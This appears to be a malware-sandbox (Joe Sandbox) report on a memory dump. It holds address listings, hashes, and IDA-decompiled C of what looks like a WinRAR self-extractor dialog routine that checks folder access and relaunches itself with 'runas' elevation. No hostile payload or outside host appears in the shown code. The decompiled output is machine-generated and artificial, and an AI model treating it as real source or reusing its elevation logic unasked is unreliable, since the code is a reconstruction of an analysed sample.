0x00e76902
0x00e76904
0x00e76908
0x00e7690c
0x00e76910
0x00e76910
0x00e76923
0x00e76928
0x00e7692e
0x00000000
0x00000000
0x00e76934
0x00e76936
0x00e7693a
0x00e76942
0x00000000
0x00e76948
0x00e7694e
0x00000000
0x00e76ba4
0x00e76958
0x00e7695a
0x00e7695e
0x00e76962
0x00e76962
0x00e76964
0x00e7696a
0x00e7696e
0x00e7696e
0x00e76970
0x00e76973
0x00e76975
0x00e76979
0x00e76980
0x00e76982
0x00e76995
0x00e7699a
0x00e769a2
0x00e769a5
0x00e769a5
0x00e769a9
0x00e769ac
0x00e769b2
0x00e769b8
0x00e769be
0x00e769c1
0x00e769c4
0x00000000
0x00e769c4
0x00e76984
0x00e76984
0x00e769c8
0x00e769c8
0x00e769cd
0x00e769d7
0x00e769dd
0x00e769e1
0x00e769e7
0x00e76a1a
0x00e76a1a
0x00e76a1f
0x00e76a30
0x00e76a30
0x00e76a37
0x00e76a21
0x00e76a21
0x00e76a28
0x00000000
0x00e76a2a
0x00e76a2a
0x00e76a2a
0x00e76a28
0x00e76a3f
0x00e76a4c
0x00e76a4e
0x00e76a51
0x00e76a55
0x00e76a55
0x00e76a57
0x00e76a5b
0x00e76a63
0x00e76a63
0x00e76a68
0x00000000
0x00000000
0x00e76a5d
0x00e76a5d
0x00e76a61
0x00000000
0x00000000
0x00e76a61
0x00e769e9
0x00e769ec
0x00e769f0
0x00e769f6
0x00e769f7
0x00e769fc
0x00e769fe
0x00e76a79
0x00e76a79
0x00e76a00
0x00e76a00
0x00e76a04
0x00e76a0f
0x00e76a0f
0x00e76a13
0x00000000
0x00e76a06
0x00e76a06
0x00e76a0d
0x00000000
0x00000000
0x00000000
0x00000000
0x00e76a0d
0x00e76a04
0x00e769fe
0x00e769e7
0x00000000
0x00e76a6a
0x00e76a6d
0x00e76a6f
0x00e76a6f
0x00e76a77
0x00e76a7e
0x00e76a7e
0x00e76a84
0x00e76a89
0x00e76a8b
0x00e76a8d
0x00e76a8f
0x00e76a8f
0x00e76a8f
0x00e76a90
0x00e76a92
0x00e76a94
0x00e76a96
0x00e76a98
0x00e76a9c
0x00e76a9c
0x00e76aa2
0x00e76aa6
0x00e76aaa
0x00e76aae
0x00e76ab0
0x00e76ab3
0x00e76ab5
0x00e76ab8
0x00e76aba
0x00e76abc
0x00e76abe
0x00e76abe
0x00e76ac0
0x00e76ac5
0x00e76ac8
0x00e76add
0x00e76aca
0x00e76acd
0x00e76acd
0x00e76ae6
0x00e76ae8
0x00e76aec
0x00e76af0
0x00e76af0
0x00e76af6
0x00e76af6
0x00e76afa
0x00e76afe
0x00e76b00
0x00e76c5b
0x00000000
0x00e76b06
0x00e76b09
0x00e76b10
0x00e76b14
0x00e76b16
0x00e76b82
0x00e76b82
0x00000000
0x00e76b18
0x00e76b18
0x00e76b18
0x00e76b1a
0x00e76b1d
0x00e76b1f
0x00e76b26
0x00e76b41
0x00e76b44
0x00e76b49
0x00e76b4b
0x00000000
0x00000000
0x00e76b28
0x00e76b2b
0x00e76b30
0x00e76b32
0x00e76b38
0x00e76b3f
0x00e76b51
0x00e76b51
0x00e76b58
0x00e76b5e
0x00e76b65
0x00e76bbc
0x00e76bc1
0x00e76bc4
0x00e76bc6
0x00e76bcc
0x00e76bd3
0x00e76bd7
0x00e76bdf
0x00e76be5
0x00e76be8
0x00e76bec
0x00e76bf3
0x00e76bf7
0x00e76bfe
0x00e76c00
0x00e76c02
0x00e76c18
0x00e76c20
0x00e76c29
0x00e76c2d
0x00e76c33
0x00000000
0x00e76c33
0x00000000
0x00e76c00
0x00e76b67
0x00e76b67
0x00e76b6b
0x00e76bb1
0x00e76bb3
0x00e76b86
0x00e76b86
0x00e76b88
0x00e76b8e
0x00e76b92
0x00e76b94
0x00e76b9a
0x00e76c45
0x00e76c47
0x00e76c49
0x00e76c3d
0x00e76c3d
0x00e76c3f
0x00e76c5f
0x00e76c5f
0x00e76c64
0x00000000
0x00000000
0x00e76c4b
0x00e76c54
0x00e76c3a
0x00e76c3a
0x00000000
0x00e76c3a
0x00e76c49
0x00e76ba0
0x00e76ba0
0x00000000
0x00e76ba0
0x00e76b9a
0x00000000
0x00000000
0x00000000
0x00e76b6b
0x00e76b65
0x00000000
0x00000000
0x00000000
0x00e76b3f
0x00e76b32
0x00000000
0x00e76b6d
0x00e76b71
0x00e76b77
0x00e76b78
0x00e76b7c
0x00e76b7c
0x00000000
0x00e76b1a
0x00e76b16
0x00000000
0x00e76b00
0x00e76bac
0x00000000
0x00e7694e
0x00e76942
0x00000000
0x00e7693a
0x00e76c6a
0x00e76c72
0x00e76c75
0x00e76c7a
0x00e76c88
0x00e76c8d
0x00e76c9b
0x00e76cb9

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 229b2c6678be49b490808658e2e8f6073f6990c6a8d661249369945ebb9c0869
Instruction ID: a48d48d7ff10f3e53ba482100a6d093ea9fb9f1361bf5828a39e77f8bf091722
Opcode Fuzzy Hash: 229b2c6678be49b490808658e2e8f6073f6990c6a8d661249369945ebb9c0869
Instruction Fuzzy Hash: 56D1E5716047418FDB14CF28C881756BBE0EF9530CF08956DE88CAB642D734E959CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00E7B170 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 725
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E7B170(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				void* _t166;
				int _t169;
				void* _t182;
				void* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				int _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t256;
				WCHAR* _t257;
				int _t261;
				int _t263;
				void* _t268;
				void* _t272;
				signed short _t277;
				int _t279;
				WCHAR* _t288;
				WCHAR* _t290;
				intOrPtr _t292;
				void* _t301;
				int _t302;
				struct HWND__* _t304;
				intOrPtr _t307;
				void* _t308;
				struct HWND__* _t309;
				void* _t311;
				struct HWND__* _t313;
				long _t314;
				struct HWND__* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;

				_t301 = __edx;
				_t287 = __ecx;
				E00E7E554(E00E9230E, _t320);
				E00E7E630();
				_t277 =  *(_t320 + 0x10);
				_t307 =  *((intOrPtr*)(_t320 + 0xc));
				_t304 =  *(_t320 + 8);
				if(E00E6130B(_t301, _t304, _t307, _t277,  *((intOrPtr*)(_t320 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t308 = _t307 - 0x110;
					__eflags = _t308;
					if(__eflags == 0) {
						_push(_t304);
						E00E7CFEE(_t287, _t301, __eflags, __fp0);
						_t105 =  *0xeac574;
						_t279 = 1;
						 *0xea844c = _t304;
						 *0xea8458 = _t304;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t304, 0x80, 1, _t105); // executed
						}
						_t106 =  *0xeb6b7c;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t304, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t304, 0x68);
						 *(_t320 - 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E00E7A004(_t320 - 0x1174, 0x800);
						_t111 = GetDlgItem(_t304, 0x66);
						__eflags =  *0xeaa472;
						_t309 = _t111;
						 *(_t320 - 0x18) = _t309;
						_t288 = 0xeaa472;
						if( *0xeaa472 == 0) {
							_t288 = _t320 - 0x1174;
						}
						SetWindowTextW(_t309, _t288);
						E00E7A558(_t309); // executed
						_push(0xea843c);
						_push(0xea8438);
						_push(0xebdc90);
						_push(_t304);
						 *0xea8463 = 0; // executed
						_t114 = E00E7AA53(_t288, _t301, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0xea8452 = _t279;
						}
						__eflags =  *0xea843c;
						if( *0xea843c > 0) {
							_push(7);
							_push( *0xea8438);
							_push(_t304);
							E00E7C085();
						}
						__eflags =  *0xebec98;
						if( *0xebec98 == 0) {
							SetDlgItemTextW(_t304, 0x6b, E00E6E0AC(_t288, 0xbf));
							SetDlgItemTextW(_t304, _t279, E00E6E0AC(_t288, 0xbe));
						}
						__eflags =  *0xea843c;
						if( *0xea843c <= 0) {
							L103:
							__eflags =  *0xea8463;
							if( *0xea8463 != 0) {
								L114:
								__eflags =  *0xeaa46c - 2;
								if( *0xeaa46c == 2) {
									EnableWindow(_t309, 0);
								}
								__eflags =  *0xea9468;
								if( *0xea9468 != 0) {
									E00E612C8(_t304, 0x67, 0);
									E00E612C8(_t304, 0x66, 0);
								}
								_t115 =  *0xeaa46c;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0xea8450;
									if( *0xea8450 == 0) {
										_push(0);
										_push(_t279);
										_push(0x111);
										_push(_t304);
										__eflags = _t115 - _t279;
										if(_t115 != _t279) {
											 *0xec20a8();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0xea8452;
								if( *0xea8452 != 0) {
									SetDlgItemTextW(_t304, _t279, E00E6E0AC(_t288, 0x90));
								}
								goto L125;
							}
							__eflags =  *0xebdc84;
							if( *0xebdc84 != 0) {
								goto L114;
							}
							__eflags =  *0xeaa46c;
							if( *0xeaa46c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t311 = 0xaa;
							 *((short*)(_t320 - 0x969c)) = 0;
							do {
								__eflags = _t311 - 0xaa;
								if(_t311 != 0xaa) {
									L109:
									__eflags = _t311 - 0xab;
									if(__eflags != 0) {
										L111:
										E00E70109(__eflags, _t320 - 0x969c, " ", 0x2000);
										E00E70109(__eflags, _t320 - 0x969c, E00E6E0AC(_t288, _t311), 0x2000);
										goto L112;
									}
									__eflags =  *0xebec98;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0xebec98;
								if( *0xebec98 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t311 = _t311 + 1;
								__eflags = _t311 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0xea8440; // 0x0
							E00E79878(_t288, __eflags,  *0xea0ed4,  *(_t320 - 0x14), _t320 - 0x969c, 0, 0);
							_t309 =  *(_t320 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0xea8438);
							_push(_t304); // executed
							E00E7C085(); // executed
							_t133 =  *0xebdc84;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0xeaa46c;
								if(__eflags == 0) {
									_t290 =  *0xea8440; // 0x0
									E00E79878(_t290, __eflags,  *0xea0ed4,  *(_t320 - 0x14), _t133, 0, 0);
									L00E8389E( *0xebdc84);
									_pop(_t288);
								}
							}
							__eflags =  *0xeaa46c - _t279;
							if( *0xeaa46c == _t279) {
								L102:
								_push(_t279);
								_push( *0xea8438);
								_push(_t304);
								E00E7C085();
								goto L103;
							} else {
								 *0xec20c8(_t304);
								__eflags =  *0xeaa46c - _t279;
								if( *0xeaa46c == _t279) {
									goto L102;
								}
								__eflags =  *0xeaa471;
								if( *0xeaa471 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0xea8438);
								_push(_t304);
								E00E7C085();
								__eflags =  *0xebec90;
								if( *0xebec90 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0xea0ed4, L"LICENSEDLG", 0, E00E7AF60, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0xea8450 = _t279;
									L26:
									_push(_t279);
									L13:
									 *0xec20b8(_t304); // executed
									L125:
									_t116 = _t279;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t308 != 1;
					if(_t308 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t277 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0xea8451;
						if( *0xea8451 != 0) {
							L23:
							GetDlgItemTextW(_t304, 0x66, _t320 - 0x2174, 0x800);
							__eflags =  *0xea8451;
							if( *0xea8451 == 0) {
								__eflags =  *0xea8452;
								if( *0xea8452 == 0) {
									_t313 = GetDlgItem(_t304, 0x68);
									__eflags =  *0xea845c; // 0x0
									if(__eflags == 0) {
										SendMessageW(_t313, 0xb1, 0, 0xffffffff);
										SendMessageW(_t313, 0xc2, 0, 0xe935b4);
									}
									SetFocus(_t313);
									__eflags =  *0xea9468;
									if( *0xea9468 == 0) {
										_t314 = 0x800;
										E00E70131(_t320 - 0x1174, _t320 - 0x2174, 0x800);
										E00E7CD9D(_t287, _t320 - 0x1174, 0x800);
										E00E63F8F(_t320 - 0x429c, 0x880, E00E6E0AC(_t287, 0xb9), _t320 - 0x1174);
										_t322 = _t322 + 0x10;
										_push(_t320 - 0x429c);
										_push(0);
										E00E7CE1E();
									} else {
										_push(E00E6E0AC(_t287, 0xba));
										_push(0);
										E00E7CE1E();
										_t314 = 0x800;
									}
									__eflags =  *0xeaa471;
									if( *0xeaa471 == 0) {
										E00E7D4AF(_t320 - 0x2174); // executed
									}
									 *(_t320 - 0xe) = 0;
									_t166 = E00E6A1EF(0, _t320, _t320 - 0x2174, 0, 0);
									_t279 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t302 = E00E7A5B3(_t320 - 0x2174);
										 *(_t320 - 0xd) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											L43:
											_t169 =  *(_t320 - 0xe);
											L44:
											_t287 =  *0xeaa471;
											__eflags = _t287;
											if(_t287 != 0) {
												L50:
												__eflags =  *(_t320 - 0xd);
												if( *(_t320 - 0xd) != 0) {
													 *0xea8454 = _t279;
													E00E612E6(_t304, 0x67, 0);
													E00E612E6(_t304, 0x66, 0);
													SetDlgItemTextW(_t304, _t279, E00E6E0AC(_t287, 0xe6)); // executed
													E00E612E6(_t304, 0x69, _t279);
													SetDlgItemTextW(_t304, 0x65, 0xe935b4); // executed
													_t315 = GetDlgItem(_t304, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0xea8438);
													_push(_t304);
													E00E7C085();
													_push(2);
													_push( *0xea8438);
													_push(_t304);
													E00E7C085();
													_push(0xebdc90);
													_push(_t304);
													 *0xec0cb4 = _t279; // executed
													E00E7D3B2(_t287, __eflags); // executed
													_push(6);
													_push( *0xea8438);
													 *0xec0cb4 = 0;
													_push(_t304); // executed
													E00E7C085(); // executed
													__eflags =  *0xea8450;
													if( *0xea8450 == 0) {
														__eflags =  *0xea845c;
														if( *0xea845c == 0) {
															__eflags =  *0xebeca4;
															if( *0xebeca4 == 0) {
																_push(4);
																_push( *0xea8438);
																_push(_t304); // executed
																E00E7C085(); // executed
															}
														}
													}
													E00E612C8(_t304, _t279, _t279);
													 *0xea8454 =  *0xea8454 & 0x00000000;
													__eflags =  *0xea8454;
													_t182 =  *0xea8450; // 0x1
													goto L75;
												}
												__eflags = _t287;
												_t169 = (_t169 & 0xffffff00 | _t287 != 0x00000000) - 0x00000001 &  *(_t320 - 0xe);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t320 - 0xd) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t320 - 0xd);
													if( *(_t320 - 0xd) != 0) {
														_push(E00E6E0AC(_t287, 0x9a));
														E00E63F8F(_t320 - 0x569c, 0xa00, L"\"%s\"\n%s", _t320 - 0x2174);
														E00E66FBA(0xea0f50, _t279);
														E00E7A195(_t304, _t320 - 0x569c, E00E6E0AC(0xea0f50, 0x96), 0x30);
														 *0xea845c =  *0xea845c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t320 - 0x1174, _t314);
												_t287 = 0xeac472;
												E00E6EE15(0xeac472, _t320 - 0x174, 0x80);
												_push(0xeab472);
												E00E63F8F(_t320 - 0x11cb4, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t320 - 0x2174);
												_t322 = _t322 + 0x14;
												 *(_t320 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t320 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t320 - 0x48)) = _t320 - 0x1174;
												 *((intOrPtr*)(_t320 - 0x44)) = _t320 - 0x11cb4;
												 *(_t320 - 0x50) = _t304;
												 *((intOrPtr*)(_t320 - 0x4c)) = L"runas";
												 *(_t320 - 0x3c) = _t279;
												 *((intOrPtr*)(_t320 - 0x38)) = 0;
												 *((intOrPtr*)(_t320 - 0x40)) = 0xea8468;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t320 - 0x14) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t320 - 0x1c) =  *(_t320 - 0x14);
												} else {
													 *0xeb6b80 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E00E70131(0xeb6b82, _t231, 0x2000);
													}
													E00E7ADBE(_t287, 0xebab82, 7);
													E00E7ADBE(_t287, 0xebbb82, 2);
													E00E7ADBE(_t287, 0xebcb82, 0x10);
													 *0xebdc83 = _t279;
													_t287 = 0xebdb82;
													E00E6EF88(_t279, 0xebdb82, _t320 - 0x174);
													 *(_t320 - 0x1c) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E00E7F750(_t238, 0xeb6b80, 0x7104);
													_t322 = _t322 + 0xc;
												}
												_t220 = ShellExecuteExW(_t320 - 0x58);
												E00E6EFD3(_t320 - 0x174, 0x80);
												E00E6EFD3(_t320 - 0x11cb4, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t320 - 0x1c);
													 *(_t320 - 0xd) = _t279;
													goto L64;
												} else {
													 *0xec20ac( *(_t320 - 0x20), 0x2710);
													_t71 = _t320 - 0x18;
													 *_t71 =  *(_t320 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t320 - 0x1c);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t320 - 0x18) + 1;
														 *(_t320 - 0x18) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xebeca4 =  *(_t320 - 0x20);
													L64:
													__eflags =  *(_t320 - 0x14);
													if( *(_t320 - 0x14) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t320 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t302;
											if(_t302 == 0) {
												goto L52;
											}
											E00E63F8F(_t320 - 0x1174, _t314, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t322 = _t322 + 0x10;
											E00E697B6(_t320 - 0x319c);
											 *(_t320 - 4) =  *(_t320 - 4) & 0x00000000;
											_push(0x11);
											_push(_t320 - 0x1174);
											_t246 = E00E698BE(_t320 - 0x319c);
											 *(_t320 - 0xd) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t320 - 0xe) = _t279;
												}
											}
											_t39 = _t320 - 4;
											 *_t39 =  *(_t320 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00E697F0(_t320 - 0x319c, _t314); // executed
											_t287 =  *0xeaa471;
											goto L50;
										}
										_t248 = GetLastError();
										_t302 =  *(_t320 - 0xd);
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t279;
										 *(_t320 - 0xe) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t320 - 0xe) = _t279;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t279 = 1;
									_t182 = 1;
									 *0xea8450 = 1;
									L75:
									__eflags =  *0xea845c;
									if( *0xea845c <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xea8451 = _t279;
									SetDlgItemTextW(_t304, _t279, E00E6E0AC(_t287, 0x90));
									_t292 =  *0xea0f50; // 0x0
									__eflags = _t292 - 9;
									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t320 - 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E00E6E0AC(_t292, 0x96);
									E00E7A195(_t304, E00E6E0AC(_t292, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t279 = 1;
							__eflags =  *0xea8452;
							if( *0xea8452 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xec0cb4;
						if( *0xec0cb4 == 0) {
							goto L23;
						} else {
							__eflags =  *0xec0cb5;
							_t256 = _t149 & 0xffffff00 |  *0xec0cb5 == 0x00000000;
							__eflags = _t256;
							 *0xec0cb5 = _t256;
							_t257 = E00E6E0AC((0 | _t256 != 0x00000000) + 0xe6, (0 | _t256 != 0x00000000) + 0xe6);
							_t279 = 1;
							SetDlgItemTextW(_t304, 1, _t257);
							while(1) {
								__eflags =  *0xec0cb5;
								if( *0xec0cb5 == 0) {
									goto L125;
								}
								__eflags =  *0xea8450;
								if( *0xea8450 != 0) {
									goto L125;
								}
								_t261 = GetMessageW(_t320 - 0x74, 0, 0, 0);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L125;
								} else {
									_t263 = IsDialogMessageW(_t304, _t320 - 0x74);
									__eflags = _t263;
									if(_t263 == 0) {
										TranslateMessage(_t320 - 0x74);
										DispatchMessageW(_t320 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t268 = _t149 - 1;
					__eflags = _t268;
					if(_t268 == 0) {
						_t279 = 1;
						__eflags =  *0xea8454;
						 *0xea8450 = 1;
						if( *0xea8454 == 0) {
							goto L12;
						}
						__eflags =  *0xea845c;
						if( *0xea845c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t268 == 0x65;
					if(_t268 == 0x65) {
						_t272 = E00E61241(_t304, E00E6E0AC(_t287, 0x64), _t320 - 0x1174);
						__eflags = _t272;
						if(_t272 != 0) {
							SetDlgItemTextW(_t304, 0x66, _t320 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x00e7b170
0x00e7b170
0x00e7b175
0x00e7b17f
0x00e7b185
0x00e7b189
0x00e7b18d
0x00e7b1a6
0x00e7b1b0
0x00e7b1b0
0x00e7b1b6
0x00e7b85c
0x00e7b85d
0x00e7b862
0x00e7b869
0x00e7b86a
0x00e7b870
0x00e7b876
0x00e7b878
0x00e7b882
0x00e7b882
0x00e7b888
0x00e7b88d
0x00e7b88f
0x00e7b89c
0x00e7b89c
0x00e7b8a5
0x00e7b8b8
0x00e7b8bb
0x00e7b8cd
0x00e7b8d5
0x00e7b8db
0x00e7b8e3
0x00e7b8e5
0x00e7b8e8
0x00e7b8ed
0x00e7b8ef
0x00e7b8ef
0x00e7b8f7
0x00e7b8fe
0x00e7b903
0x00e7b908
0x00e7b90d
0x00e7b912
0x00e7b913
0x00e7b91a
0x00e7b91f
0x00e7b921
0x00e7b923
0x00e7b923
0x00e7b929
0x00e7b930
0x00e7b932
0x00e7b934
0x00e7b93a
0x00e7b93b
0x00e7b93b
0x00e7b940
0x00e7b947
0x00e7b957
0x00e7b96a
0x00e7b96a
0x00e7b970
0x00e7b977
0x00e7ba28
0x00e7ba28
0x00e7ba2f
0x00e7bad8
0x00e7bad8
0x00e7badf
0x00e7bae4
0x00e7bae4
0x00e7baea
0x00e7baf1
0x00e7baf8
0x00e7bb02
0x00e7bb02
0x00e7bb07
0x00e7bb0c
0x00e7bb0e
0x00e7bb10
0x00e7bb17
0x00e7bb19
0x00e7bb1b
0x00e7bb1c
0x00e7bb21
0x00e7bb22
0x00e7bb24
0x00e7bb2e
0x00e7bb26
0x00e7bb26
0x00e7bb26
0x00e7bb24
0x00e7bb17
0x00e7bb34
0x00e7bb3b
0x00e7bb4a
0x00e7bb4a
0x00000000
0x00e7bb3b
0x00e7ba35
0x00e7ba3c
0x00000000
0x00000000
0x00e7ba42
0x00e7ba49
0x00000000
0x00000000
0x00e7ba4f
0x00e7ba51
0x00e7ba56
0x00e7ba5d
0x00e7ba5d
0x00e7ba63
0x00e7ba6e
0x00e7ba6e
0x00e7ba74
0x00e7ba7f
0x00e7ba90
0x00e7baa8
0x00000000
0x00e7baa8
0x00e7ba76
0x00e7ba7d
0x00000000
0x00000000
0x00000000
0x00e7ba7d
0x00e7ba65
0x00e7ba6c
0x00000000
0x00000000
0x00000000
0x00e7baad
0x00e7baad
0x00e7baae
0x00e7baae
0x00e7bab6
0x00e7bad0
0x00e7bad5
0x00000000
0x00e7b97d
0x00e7b97d
0x00e7b97f
0x00e7b985
0x00e7b986
0x00e7b98b
0x00e7b990
0x00e7b992
0x00e7b994
0x00e7b99b
0x00e7b99d
0x00e7b9b1
0x00e7b9bc
0x00e7b9c1
0x00e7b9c1
0x00e7b99b
0x00e7b9c2
0x00e7b9c8
0x00e7ba1b
0x00e7ba1b
0x00e7ba1c
0x00e7ba22
0x00e7ba23
0x00000000
0x00e7b9ca
0x00e7b9cb
0x00e7b9d1
0x00e7b9d7
0x00000000
0x00000000
0x00e7b9d9
0x00e7b9e0
0x00000000
0x00000000
0x00e7b9e2
0x00e7b9e4
0x00e7b9ea
0x00e7b9eb
0x00e7b9f0
0x00e7b9f7
0x00000000
0x00000000
0x00e7ba0d
0x00e7ba13
0x00e7ba15
0x00e7b2fb
0x00e7b2fb
0x00e7b301
0x00e7b301
0x00e7b226
0x00e7b227
0x00e7bb50
0x00e7bb50
0x00e7bb52
0x00e7bb58
0x00e7bb62
0x00e7bb62
0x00000000
0x00e7ba15
0x00e7b9c8
0x00e7b977
0x00e7b1bc
0x00e7b1bf
0x00e7b1d3
0x00e7b1d3
0x00000000
0x00e7b1d3
0x00e7b1c4
0x00e7b1c4
0x00e7b1c7
0x00e7b232
0x00e7b239
0x00e7b2d1
0x00e7b2e0
0x00e7b2e6
0x00e7b2ed
0x00e7b307
0x00e7b30e
0x00e7b32a
0x00e7b32c
0x00e7b332
0x00e7b33d
0x00e7b34f
0x00e7b34f
0x00e7b356
0x00e7b35c
0x00e7b363
0x00e7b37d
0x00e7b391
0x00e7b39e
0x00e7b3c1
0x00e7b3c6
0x00e7b3cf
0x00e7b3d0
0x00e7b3d1
0x00e7b365
0x00e7b36f
0x00e7b370
0x00e7b371
0x00e7b376
0x00e7b376
0x00e7b3d6
0x00e7b3dd
0x00e7b3e6
0x00e7b3e6
0x00e7b3f6
0x00e7b3f9
0x00e7b400
0x00e7b401
0x00e7b403
0x00e7b41a
0x00e7b426
0x00e7b428
0x00e7b42b
0x00e7b42d
0x00e7b444
0x00e7b444
0x00e7b447
0x00e7b447
0x00e7b44d
0x00e7b44f
0x00e7b4be
0x00e7b4be
0x00e7b4c2
0x00e7b702
0x00e7b708
0x00e7b712
0x00e7b724
0x00e7b72e
0x00e7b73b
0x00e7b74a
0x00e7b74c
0x00e7b74e
0x00e7b759
0x00e7b759
0x00e7b762
0x00e7b762
0x00e7b768
0x00e7b76a
0x00e7b770
0x00e7b771
0x00e7b776
0x00e7b778
0x00e7b77e
0x00e7b77f
0x00e7b784
0x00e7b789
0x00e7b78a
0x00e7b790
0x00e7b795
0x00e7b797
0x00e7b79d
0x00e7b7a4
0x00e7b7a5
0x00e7b7aa
0x00e7b7b1
0x00e7b7b3
0x00e7b7ba
0x00e7b7bc
0x00e7b7c3
0x00e7b7c5
0x00e7b7c7
0x00e7b7cd
0x00e7b7ce
0x00e7b7ce
0x00e7b7c3
0x00e7b7ba
0x00e7b7d6
0x00e7b7db
0x00e7b7db
0x00e7b7e2
0x00000000
0x00e7b7e2
0x00e7b4c8
0x00e7b4cf
0x00e7b4cf
0x00e7b4d2
0x00e7b4d2
0x00e7b4d4
0x00e7b4d8
0x00e7b4da
0x00e7b698
0x00e7b698
0x00e7b69c
0x00e7b6ac
0x00e7b6c5
0x00e7b6d3
0x00e7b6ed
0x00e7b6f2
0x00e7b6f2
0x00e7b224
0x00e7b224
0x00000000
0x00e7b224
0x00e7b4ea
0x00e7b4fb
0x00e7b501
0x00e7b506
0x00e7b523
0x00e7b528
0x00e7b52b
0x00e7b538
0x00e7b53f
0x00e7b548
0x00e7b560
0x00e7b563
0x00e7b56a
